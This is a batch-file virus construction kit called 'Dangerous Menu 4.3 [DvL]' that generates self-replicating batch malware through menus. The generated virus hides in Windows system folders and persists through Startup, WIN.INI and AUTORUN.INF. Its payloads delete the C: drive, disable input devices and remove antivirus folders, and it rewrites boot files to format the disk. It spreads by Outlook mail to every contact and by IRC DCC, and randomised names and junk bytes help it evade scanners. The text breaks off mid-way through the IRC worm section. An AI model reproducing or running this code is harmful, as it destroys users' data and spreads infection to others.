@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
ctty con
cls
echo.
echo.
echo.
echo                       ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                       ³ °±²Û Dangerous Menu 4.3 Û²±° ³ [DvL]
echo                       ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo.     Fooling AV`z
echo      ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo    1 - EICAR
echo    2 - Fake bytes
echo    3 - EICAR & fake bytes
echo.
echo    4 - Next page
echo.
echo    Q - eXit
echo.
choice /c:1234Q>nul
if errorlevel 5 goto end
if errorlevel 4 goto a4
if errorlevel 3 goto a3
if errorlevel 2 goto a2
if errorlevel 1 goto a1
goto done

:a1
cls
ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.b.Writeline "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu [DvL]">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.c="">>batvirus.vbs
echo.d=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To d>>batvirus.vbs
echo.c=c&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "md %%windir%%\system\"&c&" >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>batvirus.vbs
echo.e="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.e=e&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&e&"=deltree/y c:\">>batvirus.vbs
echo.g="">>batvirus.vbs
echo.h=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To h>>batvirus.vbs
echo.g=g&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&g&"=progra~1\">>batvirus.vbs
ctty con
goto 001

:a2
cls
ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.c=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.d=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.e=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.f=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.g=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.b.Write c&d&e&f&g&c&d&e&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write d&e&f&g&c&d&e&f&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write e&f&g&c&d&e&f&g&c>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write f&g&c&d&e&f&g&c&d>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write g&c&d&e&f&g&c&d&e>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write c&d&e&f&g&c&d&e&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write d&e&f&g&c&d&e&f&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write e&f&g&c&d&e&f&g&c>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write f&g&c&d&e&f&g&c&d>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write g&c&d&e&f&g&c&d&e>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu [DvL]">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.c="">>batvirus.vbs
echo.d=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To d>>batvirus.vbs
echo.c=c&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "md %%windir%%\system\"&c&" >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>batvirus.vbs
echo.e="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.e=e&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&e&"=deltree/y c:\">>batvirus.vbs
echo.g="">>batvirus.vbs
echo.h=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To h>>batvirus.vbs
echo.g=g&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&g&"=progra~1\">>batvirus.vbs
ctty con
goto 001

:a3
cls
ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.b.Writeline "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>batvirus.vbs
echo.c=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.d=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.e=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.f=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.g=int((rnd*9999999999999)+1)>>batvirus.vbs
echo.b.Write c&d&e&f&g&c&d&e&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write d&e&f&g&c&d&e&f&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write e&f&g&c&d&e&f&g&c>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write f&g&c&d&e&f&g&c&d>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write g&c&d&e&f&g&c&d&e>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write c&d&e&f&g&c&d&e&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write d&e&f&g&c&d&e&f&f>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write e&f&g&c&d&e&f&g&c>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write f&g&c&d&e&f&g&c&d>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Write g&c&d&e&f&g&c&d&e>>batvirus.vbs
echo.b.WriteBlankLines "1">>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu [DvL]">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.c="">>batvirus.vbs
echo.d=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To d>>batvirus.vbs
echo.c=c&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "md %%windir%%\system\"&c&" >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>batvirus.vbs
echo.e="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.e=e&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&e&"=deltree/y c:\">>batvirus.vbs
echo.g="">>batvirus.vbs
echo.h=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To h>>batvirus.vbs
echo.g=g&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&g&"=progra~1\">>batvirus.vbs
ctty con
goto 001

:a4
cls
ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu [DvL]">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.c="">>batvirus.vbs
echo.d=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To d>>batvirus.vbs
echo.c=c&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "md %%windir%%\system\"&c&" >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>batvirus.vbs
echo.e="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.e=e&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&e&"=deltree/y c:\">>batvirus.vbs
echo.g="">>batvirus.vbs
echo.h=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To h>>batvirus.vbs
echo.g=g&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&g&"=progra~1\">>batvirus.vbs
ctty con

:001
cls
echo.
echo.
echo.
echo        Running options
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Run via STARTUP folder
echo    2 - Run via WIN.INI file
echo    3 - Run via AUTORUN.INF file 
echo.
echo    4 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:1234Q>nul
if errorlevel 5 goto done
if errorlevel 4 goto 002
if errorlevel 3 goto a7
if errorlevel 2 goto a6
if errorlevel 1 goto a5
goto done

:a5
cls
ctty nul
echo.b.Writeline "copy %%0 %%windir%%\startm~1\programs\startup\"&c&".bat >nul">>batvirus.vbs
ctty con
goto 002

:a6
cls
ctty nul
echo.b.Writeline "echo.[windows]>%%windir%%\system\"&c&"\"&c>>batvirus.vbs
echo.b.Writeline "echo.load=%windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c>>batvirus.vbs
echo.b.Writeline "echo.run=>>%%windir%%\system\"&c&"\"&c>>batvirus.vbs
echo.b.Writeline "echo.NullPort=None>>%%windir%%\system\"&c&"\"&c>>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\system\"&c&"\"&c>>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&"+%%windir%%\win.ini %%windir%%\system\win.ini">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"windows\win.ini >nul">>batvirus.vbs
echo.b.Writeline "move %%windir%%\system\win.ini %%windir%%\win.ini">>batvirus.vbs
ctty con
goto 002

:a7
cls
ctty nul
echo.b.Writeline "echo.[AutoRun]>%%windir%%\system\"&c&"\"&c&".inf">>batvirus.vbs
echo.b.Writeline "echo.open=%windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".inf">>batvirus.vbs
echo.b.Writeline "echo.icon=%windir%\system\shell32.dll,0>>%%windir%%\system\"&c&"\"&c&".inf">>batvirus.vbs
echo.b.Writeline "for %%%%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%a:\nul copy %%windir%%\system\"&c&"\"&c&".inf %%%%a:\autorun.inf /y">>batvirus.vbs
ctty con

:002
cls
echo.
echo.
echo.
echo        Mouse & keyboard payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Disable mouse & keyboard
echo    2 - Disable keyboard & swap mouse buttons 
echo.
echo    3 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:123Q>nul
if errorlevel 4 goto done
if errorlevel 3 goto 003
if errorlevel 2 goto a9
if errorlevel 1 goto a8
goto done

:a8
cls
ctty nul
echo.b.Writeline "rundll32 mouse,disable">>batvirus.vbs
echo.b.Writeline "rundll32 keyboard,disable">>batvirus.vbs
ctty con
goto 003

:a9
cls
ctty nul
echo.b.Writeline "rundll32 user,swapmousebutton">>batvirus.vbs
echo.b.Writeline "rundll32 keyboard,disable">>batvirus.vbs
ctty con

:003
cls
echo.
echo.
echo.
echo        Atack AV`z
echo        ÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Do retro
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 004
if errorlevel 1 goto a10
goto done

:a10
cls
ctty nul
echo.b.Writeline %&e&%&"antiba~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.3\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.4\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.5\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.6\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.7\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiba~1.8\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antivi~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antivi~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"antiviru\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"avg\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"avp\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"avp30\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"avx\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"avpers~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"bitdef~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"bitdef~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"comman~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"cleancih\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"esafen\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"findvi~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"f-macro\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"f-prot\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"f-prot95\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"f-secu~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"fwin\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"fwin32\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"inocul~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"inocul~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"kasper~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"kasper~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"mcafee\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"mcafee~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"msav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"norman\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"norton~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"norton~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"pav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"pccill~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"pc-cil~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"rav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"softwin\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"tbav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"tbavw95\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"toolkit\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"trendm~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"trex\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"virus\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"vpc\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"vs95\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"zonela~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&"zonela~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.3\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.4\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.5\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.6\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.7\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antiba~1.8\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antivi~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"antivi~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"avg\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"avp\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"avx\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"avx2000\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"avpers~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"bitdef~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"bitdef~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"comman~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"common~1\avpsha~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"common~1\symant~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"datafe~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"deerfi~1.com\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"f-prot\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"f-prot95\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"findvi~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"f-secu~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"f-secure\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"fsi\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"fwin\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"fwin32\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"grisoft\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"inocul~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"inocul~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"intern~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"kasper~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"kasper~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"mcafee\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"mcafee~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"mindso~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"norman\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"norton~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"norton~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"pandas~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"protec~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"protec~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"quickh~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"rav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"signal9\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"softwin\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"spysto~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"symant~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"tbav\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"tinype~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"trendm~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"trendp~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"trojan~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"trojan~2\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"virusm~1.0\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"zonela~1\ >nul">>batvirus.vbs
echo.b.Writeline %&e&%&%&g&%&"zonela~2\ >nul">>batvirus.vbs
ctty con

:004
cls
echo.
echo.
echo.
echo        Autoexec.bat & Config.sys payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Payloads for autoexec.bat & config.sys
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 005
if errorlevel 1 goto a11
goto done

:a11
cls
ctty nul
echo.b.Writeline "echo.time 00:00:00,00>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.date 80-01-01>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.[menu]>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.menuitem="&g&">>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.["&g&"]>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.buffers=1>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.files=1>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.lastdrive=A>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set path="&chr(37)&e&chr(37)&">>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set temp=A:\>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set windir=format c:/u/q/autotest>>c:\config.sys">>batvirus.vbs
ctty con

:005
cls
echo.
echo.
echo.
echo        Outlook Express e-mail worm
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Outlook Express spreading
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 006
if errorlevel 1 goto a12
goto done

:a12
cls
ctty nul
echo.t="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.t=t&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&t&"=adress">>batvirus.vbs
echo.u="">>batvirus.vbs
echo.f=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To f>>batvirus.vbs
echo.u=u&chr(int(rnd(1)*26)+97)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&u&"=attachments.add">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "echo.set abc=createobject("&Chr(34)&"outlook.application"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.set bac=abc.getnamespace("&Chr(34)&"MAPI"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.set cab=bac."&%&t&%&"lists>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.for each d in cab>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.for e=1 to d."&%&t&%&"entries.count>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.dim f>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.set f=abc.createitem(0)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.to=d."&%&t&%&"entries(e)."&%&t&%&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.subject="&chr(34)&chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.body="&chr(34)&chr(34)&"&d."&%&t&%&"entries(e).name&"&chr(34)&chr(34)&"&vbcrlf>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf&"&chr(34)&chr(34)&"&f>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f."&Chr(37)&u&Chr(37)&" "&Chr(34)&"c:\"&c&".bat"&Chr(34)&",1,len(f.body),"&Chr(34)&c&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.importance=2>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.send>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
ctty con

:006
cls
echo.
echo.
echo.
echo        IRC worm
echo        ÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via IRC
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 007
if errorlevel 1 goto a13
goto done

:a13
cls
ctty nul
echo.b.Writeline "echo.[script]>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.n0=on 1:JOIN:#:{>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.n1=/if ( $nick == $me ) { halt }>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.n2=/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
